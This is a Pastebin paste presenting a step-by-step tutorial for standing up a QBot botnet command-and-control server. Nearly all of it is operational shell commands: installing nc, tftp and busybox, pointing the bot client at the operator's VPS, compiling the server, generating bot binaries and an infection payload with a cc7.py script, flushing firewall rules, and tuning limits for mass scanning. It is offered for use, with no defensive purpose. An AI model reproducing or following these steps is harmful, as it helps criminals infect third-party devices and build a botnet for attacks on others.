Merlyz

QBOT BOTNET TUTORIAL

Oct 12th, 2020
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.91 KB | None | 0 0
  1. [Merlyns QBOT BOTNET TUTORIAL]
  2. _______________________________________________________________________________________________________________________________________
  3.  
  4. 1. Please always use this when you install a net
  5. [Copy all and paste]
  6.  
  7. yum install python python-paramiko gcc nano wget nc screen psmisc bzip2 -y
  8. yum install screen -y ; yum install httpd -y; yum install tftp -y; yum install nc -y; yum install gcc -y; yum install nano -y; yum install wget -y; yum install busybox -y
  9. ulimit -n 999999
  10. _______________________________________________________________________________________________________________________________________
  11.  
  12. 2. Insert your cc7.py client.c and server.c.
  13. into your VPS/server.
  14. _______________________________________________________________________________________________________________________________________
  15.  
  16. 3. In your client.c/Bot.c
  17. [Change the IP in there to your VPS/Servr IP] ¦ [WHY IS IT NEEDED?]
  18. [You can also change the BotPort if you so choose] ¦ IF YOU DO NOT CHANGE THE IP IN THE CLIENT.C/BOT.C YOU WILL NOT GET BOTS
  19. _______________________________________________________________________________________________________________________________________
  20.  
  21. 4. Go back to your putty terminal and type in ¦ [WHATS THIS DO?]
  22. [gcc server.c -o server -pthread] ¦ THIS COMPILES YOUR SERVER SIDE
  23. _______________________________________________________________________________________________________________________________________
  24.  
  25. 5. Then depending on what server.c you use, you might have to type to make a login: ¦ [WHATS THIS DO?]
  26. [echo Yourusername Yourpassword>>login.txt] ¦ CREATE A LOGIN.TXT AND PUTS YOUR USER INTO IT
  27. _______________________________________________________________________________________________________________________________________
  28.  
  29. 7. Go back to your putty terminal and type: ¦ [WHATS THIS DO?]
  30. [python cc7.py client.c YourVPSIP] ¦THIS CREATE YOUR BINS SO BOTS MAY CONNECT TO YOUR NET
  31. _______________________________________________________________________________________________________________________________________
  32.  
  33. 8. After that's done type: ¦ [WHATS THIS DO?]
  34. [iptables -F] ¦CONFIGURES YOUR BOTNET
  35.  
  36. _______________________________________________________________________________________________________________________________________
  37.  
  38. 9. Then type: ¦ [WHATS THIS DO?]
  39. screen ./server [BOTPORT] 100 [What you want your Server to be screen on] ¦ SCREENS YOUR BOTNET SO YOU MAY LOGIN AND USE IT
  40.  
  41. _______________________________________________________________________________________________________________________________________
  42.  
  43. [PAYLOAD]
  44. When you do this command it will give you a payload SAVE IT. because you'll need it. ¦ [WHY DO YOU NEED YOUR PAYLOAD?]
  45. [python cc7.py client.c YourVPSIP] ¦ IT ALLOWS YOU TO SCAN BOTS ON DIFFERENT SCANNERS
  46. _______________________________________________________________________________________________________________________________________
  47. 11. Then open up putty terminal and change the port connection to raw and whatever u chose for ur cnc port and login. :)
  48.  
  49. _______________________________________________________________________________________________________________________________________
  50. 12. THIS IS OPTIONAL [GOOD FOR SCANNING]
  51.  
  52. nano /usr/include/bits/typesizes.h
  53. Change the number 1035 or what ever it is in the text file to 9999999
Add Comment
Please, Sign In to add comment